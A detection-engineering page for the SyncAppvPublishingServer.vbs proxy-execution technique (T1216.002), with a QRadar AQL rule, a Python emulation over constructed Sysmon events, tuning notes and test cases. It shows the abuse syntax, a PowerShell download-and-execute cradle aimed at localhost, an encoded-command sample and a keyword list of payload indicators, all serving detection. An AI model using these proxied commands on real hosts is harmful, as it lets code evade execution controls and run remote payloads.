T1216.002 IBM QRadar · QRadar

Detect SyncAppvPublishingServer in IBM QRadar

Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious PowerShell commands, bypassing execution restrictions and evading defensive countermeasures. SyncAppvPublishingServer.vbs is a legitimate, Microsoft-signed Visual Basic script associated with Windows Application Virtualization (App-V), located in System32 and commonly executed via wscript.exe or cscript.exe. By embedding PowerShell commands in the script's argument using the syntax `SyncAppvPublishingServer.vbs "n; {PowerShell}"`, adversaries have a trusted, signed script launch their PowerShell logic instead of calling powershell.exe directly from the initial foothold. This technique has been observed in DarkHotel APT and BlueNoroff campaigns as a means of evading execution policy restrictions and process-based detection rules that key on which process launched powershell.exe. Note that the script still starts powershell.exe to run the injected command, so PowerShell script block logging (Event ID 4104), where enabled, records the payload; what changes is the parent process, which is why the detection below inspects the parent chain as well as the script host's command line.

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1216 System Script Proxy Execution
Sub-technique
T1216.002 SyncAppvPublishingServer
Canonical reference
https://attack.mitre.org/techniques/T1216/002/

QRadar Detection Query

IBM QRadar (QRadar)

```sql
SELECT
  DATEFORMAT(starttime, 'yyyy-MM-dd HH:mm:ss') AS event_time,
  LOGSOURCENAME(logsourceid) AS log_source,
  sourceip AS host_ip,
  username,
  "Process Image" AS process_image,
  "CommandLine" AS command_line,
  "Parent Process Image" AS parent_image,
  "Parent CommandLine" AS parent_command_line
FROM events
WHERE
  LOGSOURCETYPEID(logsourceid) = 12
  AND QIDNAME(qid) ILIKE '%process create%'
  AND (
    /* Branch 1: wscript/cscript invoking SyncAppvPublishingServer with an embedded PS payload.
       AQL MATCHES must match the whole value, so the image patterns start with .*\\ to
       absorb the directory path. ILIKE is already case-insensitive, so no LOWER() is needed there. */
    (
      LOWER("Process Image") MATCHES '.*\\(wscript|cscript)\.exe'
      AND "CommandLine" ILIKE '%syncappvpublishingserver%'
      AND (
           "CommandLine" ILIKE '%invoke-expression%'
        OR "CommandLine" ILIKE '%iex(%'
        OR "CommandLine" ILIKE '%iex %'
        OR "CommandLine" ILIKE '%net.webclient%'
        OR "CommandLine" ILIKE '%downloadstring%'
        OR "CommandLine" ILIKE '%downloadfile%'
        OR "CommandLine" ILIKE '%-encodedcommand%'
        OR "CommandLine" ILIKE '%-enc %'
        OR "CommandLine" ILIKE '%new-object%'
        OR "CommandLine" ILIKE '%bypass%'
        OR "CommandLine" ILIKE '%shellcode%'
        OR "CommandLine" ILIKE '%frombase64string%'
        OR "CommandLine" ILIKE '%amsiutils%'
      )
    )
    OR
    /* Branch 2: PowerShell spawned as a child of the wscript/cscript process that ran SyncAppvPublishingServer */
    (
      LOWER("Process Image") MATCHES '.*\\(powershell|pwsh)\.exe'
      AND LOWER("Parent Process Image") MATCHES '.*\\(wscript|cscript)\.exe'
      AND "Parent CommandLine" ILIKE '%syncappvpublishingserver%'
    )
    OR
    /* Branch 3: SyncAppvPublishingServer invoked from a parent outside the expected set */
    (
      LOWER("Process Image") MATCHES '.*\\(wscript|cscript)\.exe'
      AND "CommandLine" ILIKE '%syncappvpublishingserver%'
      AND NOT (LOWER("Parent Process Image") MATCHES '.*\\(explorer|svchost|services|winlogon|cmd)\.exe')
    )
  )
ORDER BY starttime DESC
LAST 24 HOURS
```

Severity: high. Confidence: medium.

Detects T1216.002 SyncAppvPublishingServer.vbs abuse using QRadar AQL against Sysmon Process Create events (Event ID 1). Three branches cover direct invocation of SyncAppvPublishingServer with PowerShell payload keywords, PowerShell spawned as a child of the wscript/cscript SyncAppv proxy, and SyncAppvPublishingServer execution from an unexpected parent. Branch 3 treats cmd.exe as an expected parent, so a cmd.exe -> wscript.exe chain (Test 4 below) is surfaced by Branch 2 once the child powershell.exe appears, or by Branch 1 if the payload carries one of the listed keywords. AQL MATCHES compares the regular expression against the entire field value rather than searching within it, so the image patterns begin with `.*\\` to absorb the directory path; a pattern such as `(wscript|cscript)\.exe$` on its own would never match a full image path. The `LAST 24 HOURS` time-range clause must follow ORDER BY. Requires that Sysmon's Image, CommandLine, ParentImage and ParentCommandLine fields are mapped to the custom event properties Process Image, CommandLine, Parent Process Image and Parent CommandLine; match these names to your deployment. LOGSOURCETYPEID 12 corresponds to Microsoft Windows Security Event Log, the DSM that parses Sysmon events forwarded by WinCollect; adjust the ID if your Sysmon events arrive through a different log source type.
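The following is an added example, not part of the original page or of any vendor content: a Python emulation of the three-branch rule above, run over constructed Sysmon Event ID 1 records so the branch logic can be checked offline before it is deployed. It uses `re.fullmatch` to model AQL's whole-value MATCHES semantics, which also shows why an unanchored `(wscript|cscript)\.exe$` pattern never matches a full image path. All events, paths and command lines are constructed samples; the dictionary keys mirror the custom event property names the rule reads.

```python
import re

# Added example: Python emulation of the QRadar rule over constructed Sysmon
# Event ID 1 records. No field below is captured telemetry.


def aql_matches(pattern: str, value: str) -> bool:
    """Model AQL MATCHES: the regex must cover the whole value, not a substring."""
    return re.fullmatch(pattern, value) is not None


SCRIPT_HOST = r".*\\(wscript|cscript)\.exe"
POWERSHELL_HOST = r".*\\(powershell|pwsh)\.exe"
EXPECTED_PARENTS = r".*\\(explorer|svchost|services|winlogon|cmd)\.exe"

# Branch 1 substrings, compared on lower-cased text like ILIKE.
PAYLOAD_KEYWORDS = (
    "invoke-expression", "iex(", "iex ", "net.webclient", "downloadstring",
    "downloadfile", "-encodedcommand", "-enc ", "new-object", "bypass",
    "shellcode", "frombase64string", "amsiutils",
)


def matching_branches(event: dict) -> list:
    """Return the rule branches (1, 2, 3) that fire for one process-create event."""
    image = event["Process Image"].lower()
    cmd = event["CommandLine"].lower()
    parent_image = event["Parent Process Image"].lower()
    parent_cmd = event["Parent CommandLine"].lower()
    hits = []
    proxy_call = aql_matches(SCRIPT_HOST, image) and "syncappvpublishingserver" in cmd
    # Branch 1: script host runs the .vbs with a payload keyword on the command line.
    if proxy_call and any(k in cmd for k in PAYLOAD_KEYWORDS):
        hits.append(1)
    # Branch 2: powershell.exe whose parent is the script host that ran the .vbs.
    if (aql_matches(POWERSHELL_HOST, image)
            and aql_matches(SCRIPT_HOST, parent_image)
            and "syncappvpublishingserver" in parent_cmd):
        hits.append(2)
    # Branch 3: the .vbs launched from a parent outside the expected set.
    if proxy_call and not aql_matches(EXPECTED_PARENTS, parent_image):
        hits.append(3)
    return hits


def run_detection(events):
    """Return [(event id, branches)] for the events the rule would surface."""
    results = []
    for ev in events:
        branches = matching_branches(ev)
        if branches:
            results.append((ev["id"], branches))
    return results


VBS = r"C:\Windows\System32\SyncAppvPublishingServer.vbs"

# Constructed sample events (not captured telemetry).
SAMPLE_EVENTS = [
    {   # Test 1 shape: benign proxy from an interactive cmd.exe. No payload keyword,
        # and cmd.exe is an expected parent, so nothing fires on this event alone.
        "id": "benign-proxy",
        "Process Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": 'wscript.exe ' + VBS + ' "n; whoami"',
        "Parent Process Image": r"C:\Windows\System32\cmd.exe",
        "Parent CommandLine": r'"C:\Windows\System32\cmd.exe"',
    },
    {   # The powershell.exe the script launches for that same call: Branch 2.
        # (Command line simplified; the one the script really builds is longer.)
        "id": "benign-proxy-child",
        "Process Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -Command "whoami"',
        "Parent Process Image": r"C:\Windows\System32\wscript.exe",
        "Parent CommandLine": 'wscript.exe ' + VBS + ' "n; whoami"',
    },
    {   # Test 3 shape: download cradle launched from Word: Branches 1 and 3.
        "id": "cradle-from-office",
        "Process Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": 'wscript.exe ' + VBS
        + ''' "n;((New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/stage.ps1'))|IEX"''',
        "Parent Process Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Parent CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n',
    },
    {   # Test 2 shape: encoded command from Explorer: Branch 1 only, because
        # explorer.exe is an expected parent. (Base64 is UTF-16LE "echo".)
        "id": "encoded-from-explorer",
        "Process Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": 'wscript.exe ' + VBS + ' "n; powershell -encodedCommand ZQBjAGgAbwA="',
        "Parent Process Image": r"C:\Windows\explorer.exe",
        "Parent CommandLine": r"C:\Windows\explorer.exe",
    },
    {   # Legitimate-looking publishing refresh from a service host: nothing fires.
        "id": "legit-refresh",
        "Process Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": 'wscript.exe ' + VBS + ' "1"',
        "Parent Process Image": r"C:\Windows\System32\svchost.exe",
        "Parent CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs",
    },
]

if __name__ == "__main__":
    for event_id, branches in run_detection(SAMPLE_EVENTS):
        print(f"{event_id}: branch(es) {branches}")
```

Running the script surfaces the child powershell.exe, the Office-launched cradle and the encoded command, and stays silent on the keyword-free benign call from cmd.exe and on the service-host refresh. That silence on the first benign event is the point to keep in mind when tuning: a SyncAppv call from an allowed parent with no listed keyword is only caught once its child powershell.exe is logged, so Sysmon must be recording the child process creation for Branch 2 to work.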

Data Sources

  • Microsoft Windows Sysmon via QRadar DSM
  • QRadar SIEM with Windows Event Log log source

Required Tables

events

False Positives & Tuning

  • Legitimate App-V package publishing operations by IT administrators where wscript.exe invokes SyncAppvPublishingServer.vbs and the command line incidentally contains PowerShell-like strings for App-V parameter passing
  • Automated software provisioning systems (e.g., SCCM App-V integration, Flexera InstallShield) that trigger SyncAppvPublishingServer invocations with dynamic command-line arguments as part of managed deployment sequences
  • Security assessment or authorized red team exercises that simulate T1216.002 in the environment as part of scheduled adversary emulation testing

Testing Methodology

Validate this detection with the four Atomic Red Team style test cases below. Each test lists the behaviour to exercise and the telemetry you should expect to see.

  1. Test 1: SyncAppvPublishingServer PowerShell Proxy — Benign Command

    Expected signal: Sysmon Event ID 1 for wscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs' and the argument 'n; whoami', and a second Sysmon Event ID 1 for the child powershell.exe (ParentImage=wscript.exe) when the script launches it. PowerShell ScriptBlock Log Event ID 4104 captures the proxied command if script block logging is enabled. Security Event ID 4688 for wscript.exe if command-line auditing is enabled.

  2. Test 2: SyncAppvPublishingServer PowerShell Proxy — Encoded Command

    Expected signal: Sysmon Event ID 1: wscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs', '-encodedCommand', and the Base64 payload. PowerShell ScriptBlock Log Event ID 4104 capturing the decoded command 'Write-Output Argus-Test-T1216.002'. If PowerShell spawns as a child process, a second Sysmon Event ID 1 for powershell.exe with parent=wscript.exe.

  3. Test 3: SyncAppvPublishingServer PowerShell Proxy — Download Cradle Simulation

    Expected signal: Sysmon Event ID 1: wscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs', 'Net.WebClient', 'DownloadString', and 'IEX'. Sysmon Event ID 3: network connection attempt to 127.0.0.1:8080 originating from wscript.exe or a child powershell.exe. PowerShell ScriptBlock Log Event ID 4104 capturing the download cradle code.

  4. Test 4: SyncAppvPublishingServer via cmd.exe — Indirect Invocation

    Expected signal: Sysmon Event ID 1 for cmd.exe (from whatever launched the test), then Sysmon Event ID 1 for wscript.exe with ParentImage=cmd.exe and CommandLine containing 'SyncAppvPublishingServer.vbs' and the PowerShell Get-Process command. The parent-child chain cmd.exe -> wscript.exe -> [powershell proxy] is captured.
